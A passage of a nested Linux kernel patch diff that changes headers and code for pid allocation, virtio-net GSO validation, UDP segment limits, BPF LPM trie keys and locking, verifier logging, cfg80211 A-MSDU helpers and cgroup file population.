++	 * @j_bmap:
++	 *
++	 * Bmap function that should be used instead of the generic
++	 * VFS bmap function.
++	 */
++	int (*j_bmap)(struct journal_s *journal, sector_t *block);
+ };
+ 
+ #define jbd2_might_wait_for_commit(j) \
+diff --git a/include/linux/pid.h b/include/linux/pid.h
+index 343abf22092e6..bf3af54de6165 100644
+--- a/include/linux/pid.h
++++ b/include/linux/pid.h
+@@ -67,7 +67,7 @@ struct pid
+ 	/* wait queue for pidfd notifications */
+ 	wait_queue_head_t wait_pidfd;
+ 	struct rcu_head rcu;
+-	struct upid numbers[1];
++	struct upid numbers[];
+ };
+ 
+ extern struct pid init_struct_pid;
+diff --git a/include/linux/sched/signal.h b/include/linux/sched/signal.h
+index 20099268fa257..669e8cff40c74 100644
+--- a/include/linux/sched/signal.h
++++ b/include/linux/sched/signal.h
+@@ -135,7 +135,7 @@ struct signal_struct {
+ #ifdef CONFIG_POSIX_TIMERS
+ 
+ 	/* POSIX.1b Interval Timers */
+-	int			posix_timer_id;
++	unsigned int		next_posix_timer_id;
+ 	struct list_head	posix_timers;
+ 
+ 	/* ITIMER_REAL timer for the process */
+diff --git a/include/linux/slab.h b/include/linux/slab.h
+index b8e77ffc38929..64cb4e26c8a6b 100644
+--- a/include/linux/slab.h
++++ b/include/linux/slab.h
+@@ -215,8 +215,9 @@ DEFINE_FREE(kfree, void *, if (!IS_ERR_OR_NULL(_T)) kfree(_T))
+ size_t ksize(const void *objp);
+ 
+ #ifdef CONFIG_PRINTK
+-bool kmem_valid_obj(void *object);
+-void kmem_dump_obj(void *object);
++bool kmem_dump_obj(void *object);
++#else
++static inline bool kmem_dump_obj(void *object) { return false; }
+ #endif
+ 
+ /*
+diff --git a/include/linux/sunrpc/svc.h b/include/linux/sunrpc/svc.h
+index 912da376ef9bf..49621cc4e01bd 100644
+--- a/include/linux/sunrpc/svc.h
++++ b/include/linux/sunrpc/svc.h
+@@ -123,19 +123,6 @@ static inline void svc_put(struct svc_serv *serv)
+ 	kref_put(&serv->sv_refcnt, svc_destroy);
+ }
+ 
+-/**
+- * svc_put_not_last - decrement non-final reference count on SUNRPC serv
+- * @serv:  the svc_serv to have count decremented
+- *
+- * Returns: %true is refcount was decremented.
+- *
+- * If the refcount is 1, it is not decremented and instead failure is reported.
+- */
+-static inline bool svc_put_not_last(struct svc_serv *serv)
+-{
+-	return refcount_dec_not_one(&serv->sv_refcnt.refcount);
+-}
+-
+ /*
+  * Maximum payload size supported by a kernel RPC server.
+  * This is use to determine the max number of pages nfsd is
+diff --git a/include/linux/udp.h b/include/linux/udp.h
+index 79a4eae6f1f8f..e0bbc05f001a4 100644
+--- a/include/linux/udp.h
++++ b/include/linux/udp.h
+@@ -102,7 +102,7 @@ struct udp_sock {
+ #define udp_assign_bit(nr, sk, val)		\
+ 	assign_bit(UDP_FLAGS_##nr, &udp_sk(sk)->udp_flags, val)
+ 
+-#define UDP_MAX_SEGMENTS	(1 << 6UL)
++#define UDP_MAX_SEGMENTS	(1 << 7UL)
+ 
+ static inline struct udp_sock *udp_sk(const struct sock *sk)
+ {
+diff --git a/include/linux/virtio_net.h b/include/linux/virtio_net.h
+index 29b19d0a324c7..823e28042f410 100644
+--- a/include/linux/virtio_net.h
++++ b/include/linux/virtio_net.h
+@@ -3,8 +3,8 @@
+ #define _LINUX_VIRTIO_NET_H
+ 
+ #include <linux/if_vlan.h>
++#include <linux/udp.h>
+ #include <uapi/linux/tcp.h>
+-#include <uapi/linux/udp.h>
+ #include <uapi/linux/virtio_net.h>
+ 
+ static inline bool virtio_net_hdr_match_proto(__be16 protocol, __u8 gso_type)
+@@ -51,7 +51,6 @@ static inline int virtio_net_hdr_to_skb(struct sk_buff *skb,
+ 	unsigned int thlen = 0;
+ 	unsigned int p_off = 0;
+ 	unsigned int ip_proto;
+-	u64 ret, remainder, gso_size;
+ 
+ 	if (hdr->gso_type != VIRTIO_NET_HDR_GSO_NONE) {
+ 		switch (hdr->gso_type & ~VIRTIO_NET_HDR_GSO_ECN) {
+@@ -88,16 +87,6 @@ static inline int virtio_net_hdr_to_skb(struct sk_buff *skb,
+ 		u32 off = __virtio16_to_cpu(little_endian, hdr->csum_offset);
+ 		u32 needed = start + max_t(u32, thlen, off + sizeof(__sum16));
+ 
+-		if (hdr->gso_size) {
+-			gso_size = __virtio16_to_cpu(little_endian, hdr->gso_size);
+-			ret = div64_u64_rem(skb->len, gso_size, &remainder);
+-			if (!(ret && (hdr->gso_size > needed) &&
+-						((remainder > needed) || (remainder == 0)))) {
+-				return -EINVAL;
+-			}
+-			skb_shinfo(skb)->tx_flags |= SKBFL_SHARED_FRAG;
+-		}
+-
+ 		if (!pskb_may_pull(skb, needed))
+ 			return -EINVAL;
+ 
+@@ -155,9 +144,27 @@ static inline int virtio_net_hdr_to_skb(struct sk_buff *skb,
+ 		unsigned int nh_off = p_off;
+ 		struct skb_shared_info *shinfo = skb_shinfo(skb);
+ 
+-		/* UFO may not include transport header in gso_size. */
+-		if (gso_type & SKB_GSO_UDP)
++		switch (gso_type & ~SKB_GSO_TCP_ECN) {
++		case SKB_GSO_UDP:
++			/* UFO may not include transport header in gso_size. */
+ 			nh_off -= thlen;
++			break;
++		case SKB_GSO_UDP_L4:
++			if (!(hdr->flags & VIRTIO_NET_HDR_F_NEEDS_CSUM))
++				return -EINVAL;
++			if (skb->csum_offset != offsetof(struct udphdr, check))
++				return -EINVAL;
++			if (skb->len - p_off > gso_size * UDP_MAX_SEGMENTS)
++				return -EINVAL;
++			if (gso_type != SKB_GSO_UDP_L4)
++				return -EINVAL;
++			break;
++		case SKB_GSO_TCPV4:
++		case SKB_GSO_TCPV6:
++			if (skb->csum_offset != offsetof(struct tcphdr, check))
++				return -EINVAL;
++			break;
++		}
+ 
+ 		/* Kernel has a special handling for GSO_BY_FRAGS. */
+ 		if (gso_size == GSO_BY_FRAGS)
+diff --git a/include/net/cfg80211.h b/include/net/cfg80211.h
+index 5bf5c1ab542ce..2a0fc4a64af1e 100644
+--- a/include/net/cfg80211.h
++++ b/include/net/cfg80211.h
+@@ -6301,6 +6301,19 @@ static inline int ieee80211_data_to_8023(struct sk_buff *skb, const u8 *addr,
+ 	return ieee80211_data_to_8023_exthdr(skb, NULL, addr, iftype, 0, false);
+ }
+ 
++/**
++ * ieee80211_is_valid_amsdu - check if subframe lengths of an A-MSDU are valid
++ *
++ * This is used to detect non-standard A-MSDU frames, e.g. the ones generated
++ * by ath10k and ath11k, where the subframe length includes the length of the
++ * mesh control field.
++ *
++ * @skb: The input A-MSDU frame without any headers.
++ * @mesh_hdr: use standard compliant mesh A-MSDU subframe header
++ * Returns: true if subframe header lengths are valid for the @mesh_hdr mode
++ */
++bool ieee80211_is_valid_amsdu(struct sk_buff *skb, bool mesh_hdr);
++
+ /**
+  * ieee80211_amsdu_to_8023s - decode an IEEE 802.11n A-MSDU frame
+  *
+@@ -6316,11 +6329,36 @@ static inline int ieee80211_data_to_8023(struct sk_buff *skb, const u8 *addr,
+  * @extra_headroom: The hardware extra headroom for SKBs in the @list.
+  * @check_da: DA to check in the inner ethernet header, or NULL
+  * @check_sa: SA to check in the inner ethernet header, or NULL
++ * @mesh_control: A-MSDU subframe header includes the mesh control field
+  */
+ void ieee80211_amsdu_to_8023s(struct sk_buff *skb, struct sk_buff_head *list,
+ 			      const u8 *addr, enum nl80211_iftype iftype,
+ 			      const unsigned int extra_headroom,
+-			      const u8 *check_da, const u8 *check_sa);
++			      const u8 *check_da, const u8 *check_sa,
++			      bool mesh_control);
++
++/**
++ * ieee80211_get_8023_tunnel_proto - get RFC1042 or bridge tunnel encap protocol
++ *
++ * Check for RFC1042 or bridge tunnel header and fetch the encapsulated
++ * protocol.
++ *
++ * @hdr: pointer to the MSDU payload
++ * @proto: destination pointer to store the protocol
++ * Return: true if encapsulation was found
++ */
++bool ieee80211_get_8023_tunnel_proto(const void *hdr, __be16 *proto);
++
++/**
++ * ieee80211_strip_8023_mesh_hdr - strip mesh header from converted 802.3 frames
++ *
++ * Strip the mesh header, which was left in by ieee80211_data_to_8023 as part
++ * of the MSDU data. Also move any source/destination addresses from the mesh
++ * header to the ethernet header (if present).
++ *
++ * @skb: The 802.3 frame with embedded mesh header
++ */
++int ieee80211_strip_8023_mesh_hdr(struct sk_buff *skb);
+ 
+ /**
+  * cfg80211_classify8021d - determine the 802.1p/1d tag for a data frame
+diff --git a/include/net/inet_timewait_sock.h b/include/net/inet_timewait_sock.h
+index 4a8e578405cb3..9365e5af8d6da 100644
+--- a/include/net/inet_timewait_sock.h
++++ b/include/net/inet_timewait_sock.h
+@@ -114,7 +114,7 @@ static inline void inet_twsk_reschedule(struct inet_timewait_sock *tw, int timeo
+ 
+ void inet_twsk_deschedule_put(struct inet_timewait_sock *tw);
+ 
+-void inet_twsk_purge(struct inet_hashinfo *hashinfo, int family);
++void inet_twsk_purge(struct inet_hashinfo *hashinfo);
+ 
+ static inline
+ struct net *twsk_net(const struct inet_timewait_sock *twsk)
+diff --git a/include/net/kcm.h b/include/net/kcm.h
+index 2d704f8f49059..8e8252e08a9ce 100644
+--- a/include/net/kcm.h
++++ b/include/net/kcm.h
+@@ -70,6 +70,7 @@ struct kcm_sock {
+ 	struct work_struct tx_work;
+ 	struct list_head wait_psock_list;
+ 	struct sk_buff *seq_skb;
++	struct mutex tx_mutex;
+ 	u32 tx_stopped : 1;
+ 
+ 	/* Don't use bit fields here, these are set under different locks */
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index cc314c383c532..c7501ca66dd34 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -352,7 +352,7 @@ void tcp_rcv_established(struct sock *sk, struct sk_buff *skb);
+ void tcp_rcv_space_adjust(struct sock *sk);
+ int tcp_twsk_unique(struct sock *sk, struct sock *sktw, void *twp);
+ void tcp_twsk_destructor(struct sock *sk);
+-void tcp_twsk_purge(struct list_head *net_exit_list, int family);
++void tcp_twsk_purge(struct list_head *net_exit_list);
+ ssize_t tcp_splice_read(struct socket *sk, loff_t *ppos,
+ 			struct pipe_inode_info *pipe, size_t len,
+ 			unsigned int flags);
+diff --git a/include/scsi/scsi_cmnd.h b/include/scsi/scsi_cmnd.h
+index 7d3622db38edc..3a92245fd845d 100644
+--- a/include/scsi/scsi_cmnd.h
++++ b/include/scsi/scsi_cmnd.h
+@@ -228,7 +228,7 @@ static inline sector_t scsi_get_lba(struct scsi_cmnd *scmd)
+ 
+ static inline unsigned int scsi_logical_block_count(struct scsi_cmnd *scmd)
+ {
+-	unsigned int shift = ilog2(scmd->device->sector_size) - SECTOR_SHIFT;
++	unsigned int shift = ilog2(scmd->device->sector_size);
+ 
+ 	return blk_rq_bytes(scsi_cmd_to_rq(scmd)) >> shift;
+ }
+diff --git a/include/soc/mscc/ocelot.h b/include/soc/mscc/ocelot.h
+index 195ca8f0b6f9d..9b5562f545486 100644
+--- a/include/soc/mscc/ocelot.h
++++ b/include/soc/mscc/ocelot.h
+@@ -977,6 +977,9 @@ struct ocelot {
+ 	const struct ocelot_stat_layout	*stats_layout;
+ 	struct list_head		stats_regions;
+ 
++	spinlock_t			inj_lock;
++	spinlock_t			xtr_lock;
++
+ 	u32				pool_size[OCELOT_SB_NUM][OCELOT_SB_POOL_NUM];
+ 	int				packet_buffer_size;
+ 	int				num_frame_refs;
+@@ -1125,10 +1128,17 @@ void __ocelot_target_write_ix(struct ocelot *ocelot, enum ocelot_target target,
+ 			      u32 val, u32 reg, u32 offset);
+ 
+ /* Packet I/O */
++void ocelot_lock_inj_grp(struct ocelot *ocelot, int grp);
++void ocelot_unlock_inj_grp(struct ocelot *ocelot, int grp);
++void ocelot_lock_xtr_grp(struct ocelot *ocelot, int grp);
++void ocelot_unlock_xtr_grp(struct ocelot *ocelot, int grp);
++void ocelot_lock_xtr_grp_bh(struct ocelot *ocelot, int grp);
++void ocelot_unlock_xtr_grp_bh(struct ocelot *ocelot, int grp);
+ bool ocelot_can_inject(struct ocelot *ocelot, int grp);
+ void ocelot_port_inject_frame(struct ocelot *ocelot, int port, int grp,
+ 			      u32 rew_op, struct sk_buff *skb);
+-void ocelot_ifh_port_set(void *ifh, int port, u32 rew_op, u32 vlan_tag);
++void ocelot_ifh_set_basic(void *ifh, struct ocelot *ocelot, int port,
++			  u32 rew_op, struct sk_buff *skb);
+ int ocelot_xtr_poll_frame(struct ocelot *ocelot, int grp, struct sk_buff **skb);
+ void ocelot_drain_cpu_queue(struct ocelot *ocelot, int grp);
+ void ocelot_ptp_rx_timestamp(struct ocelot *ocelot, struct sk_buff *skb,
+diff --git a/include/trace/events/huge_memory.h b/include/trace/events/huge_memory.h
+index 760455dfa8600..01591e7995235 100644
+--- a/include/trace/events/huge_memory.h
++++ b/include/trace/events/huge_memory.h
+@@ -36,7 +36,8 @@
+ 	EM( SCAN_ALLOC_HUGE_PAGE_FAIL,	"alloc_huge_page_failed")	\
+ 	EM( SCAN_CGROUP_CHARGE_FAIL,	"ccgroup_charge_failed")	\
+ 	EM( SCAN_TRUNCATED,		"truncated")			\
+-	EMe(SCAN_PAGE_HAS_PRIVATE,	"page_has_private")		\
++	EM( SCAN_PAGE_HAS_PRIVATE,	"page_has_private")		\
++	EMe(SCAN_STORE_FAILED,		"store_failed")
+ 
+ #undef EM
+ #undef EMe
+diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
+index a17688011440e..58c7fc75da752 100644
+--- a/include/uapi/linux/bpf.h
++++ b/include/uapi/linux/bpf.h
+@@ -76,12 +76,29 @@ struct bpf_insn {
+ 	__s32	imm;		/* signed immediate constant */
+ };
+ 
+-/* Key of an a BPF_MAP_TYPE_LPM_TRIE entry */
++/* Deprecated: use struct bpf_lpm_trie_key_u8 (when the "data" member is needed for
++ * byte access) or struct bpf_lpm_trie_key_hdr (when using an alternative type for
++ * the trailing flexible array member) instead.
++ */
+ struct bpf_lpm_trie_key {
+ 	__u32	prefixlen;	/* up to 32 for AF_INET, 128 for AF_INET6 */
+ 	__u8	data[0];	/* Arbitrary size */
+ };
+ 
++/* Header for bpf_lpm_trie_key structs */
++struct bpf_lpm_trie_key_hdr {
++	__u32	prefixlen;
++};
++
++/* Key of an a BPF_MAP_TYPE_LPM_TRIE entry, with trailing byte array. */
++struct bpf_lpm_trie_key_u8 {
++	union {
++		struct bpf_lpm_trie_key_hdr	hdr;
++		__u32				prefixlen;
++	};
++	__u8	data[];		/* Arbitrary size */
++};
++
+ struct bpf_cgroup_storage_key {
+ 	__u64	cgroup_inode_id;	/* cgroup inode id */
+ 	__u32	attach_type;		/* program attach type (enum bpf_attach_type) */
+diff --git a/init/Kconfig b/init/Kconfig
+index 4cd3fc82b09e5..2825c8cfde3b5 100644
+--- a/init/Kconfig
++++ b/init/Kconfig
+@@ -1942,12 +1942,15 @@ config RUST
+ config RUSTC_VERSION_TEXT
+ 	string
+ 	depends on RUST
+-	default $(shell,command -v $(RUSTC) >/dev/null 2>&1 && $(RUSTC) --version || echo n)
++	default "$(shell,$(RUSTC) --version 2>/dev/null)"
+ 
+ config BINDGEN_VERSION_TEXT
+ 	string
+ 	depends on RUST
+-	default $(shell,command -v $(BINDGEN) >/dev/null 2>&1 && $(BINDGEN) --version || echo n)
++	# The dummy parameter `workaround-for-0.69.0` is required to support 0.69.0
++	# (https://github.com/rust-lang/rust-bindgen/pull/2678). It can be removed when
++	# the minimum version is upgraded past that (0.69.1 already fixed the issue).
++	default "$(shell,$(BINDGEN) --version workaround-for-0.69.0 2>/dev/null)"
+ 
+ #
+ # Place an empty function call at each tracepoint site. Can be
+diff --git a/kernel/bpf/Makefile b/kernel/bpf/Makefile
+index 341c94f208f4c..5b86ea9f09c46 100644
+--- a/kernel/bpf/Makefile
++++ b/kernel/bpf/Makefile
+@@ -6,7 +6,8 @@ cflags-nogcse-$(CONFIG_X86)$(CONFIG_CC_IS_GCC) := -fno-gcse
+ endif
+ CFLAGS_core.o += $(call cc-disable-warning, override-init) $(cflags-nogcse-yy)
+ 
+-obj-$(CONFIG_BPF_SYSCALL) += syscall.o verifier.o inode.o helpers.o tnum.o bpf_iter.o map_iter.o task_iter.o prog_iter.o link_iter.o
++obj-$(CONFIG_BPF_SYSCALL) += syscall.o verifier.o inode.o helpers.o tnum.o log.o
++obj-$(CONFIG_BPF_SYSCALL) += bpf_iter.o map_iter.o task_iter.o prog_iter.o link_iter.o
+ obj-$(CONFIG_BPF_SYSCALL) += hashtab.o arraymap.o percpu_freelist.o bpf_lru_list.o lpm_trie.o map_in_map.o bloom_filter.o
+ obj-$(CONFIG_BPF_SYSCALL) += local_storage.o queue_stack_maps.o ringbuf.o
+ obj-$(CONFIG_BPF_SYSCALL) += bpf_local_storage.o bpf_task_storage.o
+diff --git a/kernel/bpf/log.c b/kernel/bpf/log.c
+new file mode 100644
+index 0000000000000..cd1b7113fbfd0
+--- /dev/null
++++ b/kernel/bpf/log.c
+@@ -0,0 +1,82 @@
++// SPDX-License-Identifier: GPL-2.0-only
++/* Copyright (c) 2011-2014 PLUMgrid, http://plumgrid.com
++ * Copyright (c) 2016 Facebook
++ * Copyright (c) 2018 Covalent IO, Inc. http://covalent.io
++ */
++#include <uapi/linux/btf.h>
++#include <linux/kernel.h>
++#include <linux/types.h>
++#include <linux/bpf.h>
++#include <linux/bpf_verifier.h>
++
++bool bpf_verifier_log_attr_valid(const struct bpf_verifier_log *log)
++{
++	return log->len_total >= 128 && log->len_total <= UINT_MAX >> 2 &&
++	       log->level && log->ubuf && !(log->level & ~BPF_LOG_MASK);
++}
++
++void bpf_verifier_vlog(struct bpf_verifier_log *log, const char *fmt,
++		       va_list args)
++{
++	unsigned int n;
++
++	n = vscnprintf(log->kbuf, BPF_VERIFIER_TMP_LOG_SIZE, fmt, args);
++
++	if (log->level == BPF_LOG_KERNEL) {
++		bool newline = n > 0 && log->kbuf[n - 1] == '\n';
++
++		pr_err("BPF: %s%s", log->kbuf, newline ? "" : "\n");
++		return;
++	}
++
++	n = min(log->len_total - log->len_used - 1, n);
++	log->kbuf[n] = '\0';
++	if (!copy_to_user(log->ubuf + log->len_used, log->kbuf, n + 1))
++		log->len_used += n;
++	else
++		log->ubuf = NULL;
++}
++
++void bpf_vlog_reset(struct bpf_verifier_log *log, u32 new_pos)
++{
++	char zero = 0;
++
++	if (!bpf_verifier_log_needed(log))
++		return;
++
++	log->len_used = new_pos;
++	if (put_user(zero, log->ubuf + new_pos))
++		log->ubuf = NULL;
++}
++
++/* log_level controls verbosity level of eBPF verifier.
++ * bpf_verifier_log_write() is used to dump the verification trace to the log,
++ * so the user can figure out what's wrong with the program
++ */
++__printf(2, 3) void bpf_verifier_log_write(struct bpf_verifier_env *env,
++					   const char *fmt, ...)
++{
++	va_list args;
++
++	if (!bpf_verifier_log_needed(&env->log))
++		return;
++
++	va_start(args, fmt);
++	bpf_verifier_vlog(&env->log, fmt, args);
++	va_end(args);
++}
++EXPORT_SYMBOL_GPL(bpf_verifier_log_write);
++
++__printf(2, 3) void bpf_log(struct bpf_verifier_log *log,
++			    const char *fmt, ...)
++{
++	va_list args;
++
++	if (!bpf_verifier_log_needed(log))
++		return;
++
++	va_start(args, fmt);
++	bpf_verifier_vlog(log, fmt, args);
++	va_end(args);
++}
++EXPORT_SYMBOL_GPL(bpf_log);
+diff --git a/kernel/bpf/lpm_trie.c b/kernel/bpf/lpm_trie.c
+index ce3a091d52e89..37b510d91b810 100644
+--- a/kernel/bpf/lpm_trie.c
++++ b/kernel/bpf/lpm_trie.c
+@@ -164,13 +164,13 @@ static inline int extract_bit(const u8 *data, size_t index)
+  */
+ static size_t longest_prefix_match(const struct lpm_trie *trie,
+ 				   const struct lpm_trie_node *node,
+-				   const struct bpf_lpm_trie_key *key)
++				   const struct bpf_lpm_trie_key_u8 *key)
+ {
+ 	u32 limit = min(node->prefixlen, key->prefixlen);
+ 	u32 prefixlen = 0, i = 0;
+ 
+ 	BUILD_BUG_ON(offsetof(struct lpm_trie_node, data) % sizeof(u32));
+-	BUILD_BUG_ON(offsetof(struct bpf_lpm_trie_key, data) % sizeof(u32));
++	BUILD_BUG_ON(offsetof(struct bpf_lpm_trie_key_u8, data) % sizeof(u32));
+ 
+ #if defined(CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS) && defined(CONFIG_64BIT)
+ 
+@@ -229,7 +229,7 @@ static void *trie_lookup_elem(struct bpf_map *map, void *_key)
+ {
+ 	struct lpm_trie *trie = container_of(map, struct lpm_trie, map);
+ 	struct lpm_trie_node *node, *found = NULL;
+-	struct bpf_lpm_trie_key *key = _key;
++	struct bpf_lpm_trie_key_u8 *key = _key;
+ 
+ 	if (key->prefixlen > trie->max_prefixlen)
+ 		return NULL;
+@@ -308,8 +308,9 @@ static int trie_update_elem(struct bpf_map *map,
+ {
+ 	struct lpm_trie *trie = container_of(map, struct lpm_trie, map);
+ 	struct lpm_trie_node *node, *im_node = NULL, *new_node = NULL;
++	struct lpm_trie_node *free_node = NULL;
+ 	struct lpm_trie_node __rcu **slot;
+-	struct bpf_lpm_trie_key *key = _key;
++	struct bpf_lpm_trie_key_u8 *key = _key;
+ 	unsigned long irq_flags;
+ 	unsigned int next_bit;
+ 	size_t matchlen = 0;
+@@ -382,7 +383,7 @@ static int trie_update_elem(struct bpf_map *map,
+ 			trie->n_entries--;
+ 
+ 		rcu_assign_pointer(*slot, new_node);
+-		kfree_rcu(node, rcu);
++		free_node = node;
+ 
+ 		goto out;
+ 	}
+@@ -429,6 +430,7 @@ static int trie_update_elem(struct bpf_map *map,
+ 	}
+ 
+ 	spin_unlock_irqrestore(&trie->lock, irq_flags);
++	kfree_rcu(free_node, rcu);
+ 
+ 	return ret;
+ }
+@@ -437,7 +439,8 @@ static int trie_update_elem(struct bpf_map *map,
+ static int trie_delete_elem(struct bpf_map *map, void *_key)
+ {
+ 	struct lpm_trie *trie = container_of(map, struct lpm_trie, map);
+-	struct bpf_lpm_trie_key *key = _key;
++	struct lpm_trie_node *free_node = NULL, *free_parent = NULL;
++	struct bpf_lpm_trie_key_u8 *key = _key;
+ 	struct lpm_trie_node __rcu **trim, **trim2;
+ 	struct lpm_trie_node *node, *parent;
+ 	unsigned long irq_flags;
+@@ -506,8 +509,8 @@ static int trie_delete_elem(struct bpf_map *map, void *_key)
+ 		else
+ 			rcu_assign_pointer(
+ 				*trim2, rcu_access_pointer(parent->child[0]));
+-		kfree_rcu(parent, rcu);
+-		kfree_rcu(node, rcu);
++		free_parent = parent;
++		free_node = node;
+ 		goto out;
+ 	}
+ 
+@@ -521,10 +524,12 @@ static int trie_delete_elem(struct bpf_map *map, void *_key)
+ 		rcu_assign_pointer(*trim, rcu_access_pointer(node->child[1]));
+ 	else
+ 		RCU_INIT_POINTER(*trim, NULL);
+-	kfree_rcu(node, rcu);
++	free_node = node;
+ 
+ out:
+ 	spin_unlock_irqrestore(&trie->lock, irq_flags);
++	kfree_rcu(free_parent, rcu);
++	kfree_rcu(free_node, rcu);
+ 
+ 	return ret;
+ }
+@@ -536,7 +541,7 @@ static int trie_delete_elem(struct bpf_map *map, void *_key)
+ 				 sizeof(struct lpm_trie_node))
+ #define LPM_VAL_SIZE_MIN	1
+ 
+-#define LPM_KEY_SIZE(X)		(sizeof(struct bpf_lpm_trie_key) + (X))
++#define LPM_KEY_SIZE(X)		(sizeof(struct bpf_lpm_trie_key_u8) + (X))
+ #define LPM_KEY_SIZE_MAX	LPM_KEY_SIZE(LPM_DATA_SIZE_MAX)
+ #define LPM_KEY_SIZE_MIN	LPM_KEY_SIZE(LPM_DATA_SIZE_MIN)
+ 
+@@ -568,7 +573,7 @@ static struct bpf_map *trie_alloc(union bpf_attr *attr)
+ 	/* copy mandatory map attributes */
+ 	bpf_map_init_from_attr(&trie->map, attr);
+ 	trie->data_size = attr->key_size -
+-			  offsetof(struct bpf_lpm_trie_key, data);
++			  offsetof(struct bpf_lpm_trie_key_u8, data);
+ 	trie->max_prefixlen = trie->data_size * 8;
+ 
+ 	spin_lock_init(&trie->lock);
+@@ -619,7 +624,7 @@ static int trie_get_next_key(struct bpf_map *map, void *_key, void *_next_key)
+ {
+ 	struct lpm_trie_node *node, *next_node = NULL, *parent, *search_root;
+ 	struct lpm_trie *trie = container_of(map, struct lpm_trie, map);
+-	struct bpf_lpm_trie_key *key = _key, *next_key = _next_key;
++	struct bpf_lpm_trie_key_u8 *key = _key, *next_key = _next_key;
+ 	struct lpm_trie_node **node_stack = NULL;
+ 	int err = 0, stack_ptr = -1;
+ 	unsigned int next_bit;
+@@ -706,7 +711,7 @@ static int trie_get_next_key(struct bpf_map *map, void *_key, void *_next_key)
+ 	}
+ do_copy:
+ 	next_key->prefixlen = next_node->prefixlen;
+-	memcpy((void *)next_key + offsetof(struct bpf_lpm_trie_key, data),
++	memcpy((void *)next_key + offsetof(struct bpf_lpm_trie_key_u8, data),
+ 	       next_node->data, trie->data_size);
+ free_stack:
+ 	kfree(node_stack);
+@@ -718,7 +723,7 @@ static int trie_check_btf(const struct bpf_map *map,
+ 			  const struct btf_type *key_type,
+ 			  const struct btf_type *value_type)
+ {
+-	/* Keys must have struct bpf_lpm_trie_key embedded. */
++	/* Keys must have struct bpf_lpm_trie_key_u8 embedded. */
+ 	return BTF_INFO_KIND(key_type->info) != BTF_KIND_STRUCT ?
+ 	       -EINVAL : 0;
+ }
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 8973d3c9597ce..4efa50eb07d72 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -291,61 +291,6 @@ find_linfo(const struct bpf_verifier_env *env, u32 insn_off)
+ 	return &linfo[i - 1];
+ }
+ 
+-void bpf_verifier_vlog(struct bpf_verifier_log *log, const char *fmt,
+-		       va_list args)
+-{
+-	unsigned int n;
+-
+-	n = vscnprintf(log->kbuf, BPF_VERIFIER_TMP_LOG_SIZE, fmt, args);
+-
+-	WARN_ONCE(n >= BPF_VERIFIER_TMP_LOG_SIZE - 1,
+-		  "verifier log line truncated - local buffer too short\n");
+-
+-	if (log->level == BPF_LOG_KERNEL) {
+-		bool newline = n > 0 && log->kbuf[n - 1] == '\n';
+-
+-		pr_err("BPF: %s%s", log->kbuf, newline ? "" : "\n");
+-		return;
+-	}
+-
+-	n = min(log->len_total - log->len_used - 1, n);
+-	log->kbuf[n] = '\0';
+-	if (!copy_to_user(log->ubuf + log->len_used, log->kbuf, n + 1))
+-		log->len_used += n;
+-	else
+-		log->ubuf = NULL;
+-}
+-
+-static void bpf_vlog_reset(struct bpf_verifier_log *log, u32 new_pos)
+-{
+-	char zero = 0;
+-
+-	if (!bpf_verifier_log_needed(log))
+-		return;
+-
+-	log->len_used = new_pos;
+-	if (put_user(zero, log->ubuf + new_pos))
+-		log->ubuf = NULL;
+-}
+-
+-/* log_level controls verbosity level of eBPF verifier.
+- * bpf_verifier_log_write() is used to dump the verification trace to the log,
+- * so the user can figure out what's wrong with the program
+- */
+-__printf(2, 3) void bpf_verifier_log_write(struct bpf_verifier_env *env,
+-					   const char *fmt, ...)
+-{
+-	va_list args;
+-
+-	if (!bpf_verifier_log_needed(&env->log))
+-		return;
+-
+-	va_start(args, fmt);
+-	bpf_verifier_vlog(&env->log, fmt, args);
+-	va_end(args);
+-}
+-EXPORT_SYMBOL_GPL(bpf_verifier_log_write);
+-
+ __printf(2, 3) static void verbose(void *private_data, const char *fmt, ...)
+ {
+ 	struct bpf_verifier_env *env = private_data;
+@@ -359,20 +304,6 @@ __printf(2, 3) static void verbose(void *private_data, const char *fmt, ...)
+ 	va_end(args);
+ }
+ 
+-__printf(2, 3) void bpf_log(struct bpf_verifier_log *log,
+-			    const char *fmt, ...)
+-{
+-	va_list args;
+-
+-	if (!bpf_verifier_log_needed(log))
+-		return;
+-
+-	va_start(args, fmt);
+-	bpf_verifier_vlog(log, fmt, args);
+-	va_end(args);
+-}
+-EXPORT_SYMBOL_GPL(bpf_log);
+-
+ static const char *ltrim(const char *s)
+ {
+ 	while (isspace(*s))
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 489c25713edcb..455f67ff31b57 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -1751,13 +1751,13 @@ static int css_populate_dir(struct cgroup_subsys_state *css)
+ 
+ 	if (!css->ss) {
+ 		if (cgroup_on_dfl(cgrp)) {
+-			ret = cgroup_addrm_files(&cgrp->self, cgrp,
++			ret = cgroup_addrm_files(css, cgrp,
+ 						 cgroup_base_files, true);
+ 			if (ret < 0)
+ 				return ret;
+ 
+ 			if (cgroup_psi_enabled()) {
+-				ret = cgroup_addrm_files(&cgrp->self, cgrp,
++				ret = cgroup_addrm_files(css, cgrp,
+ 							 cgroup_psi_files, true);
+ 				if (ret < 0)
+ 					return ret;
+diff --git a/kernel/pid.c b/kernel/pid.c
+index 3fbc5e46b7217..74834c04a0818 100644
+--- a/kernel/pid.c
++++ b/kernel/pid.c
+@@ -661,8 +661,11 @@ void __init pid_idr_init(void)
+ 
+ 	idr_init(&init_pid_ns.idr);
+ 
+-	init_pid_ns.pid_cachep = KMEM_CACHE(pid,
+-			SLAB_HWCACHE_ALIGN | SLAB_PANIC | SLAB_ACCOUNT);
++	init_pid_ns.pid_cachep = kmem_cache_create("pid",
++			struct_size((struct pid *)NULL, numbers, 1),
++			__alignof__(struct pid),
++			SLAB_HWCACHE_ALIGN | SLAB_PANIC | SLAB_ACCOUNT,
++			NULL);
+ }
+ 
+ static struct file *__pidfd_fget(struct task_struct *task, int fd)
+diff --git a/kernel/pid_namespace.c b/kernel/pid_namespace.c
+index 1daadbefcee3a..a575fabf697eb 100644
+--- a/kernel/pid_namespace.c
++++ b/kernel/pid_namespace.c
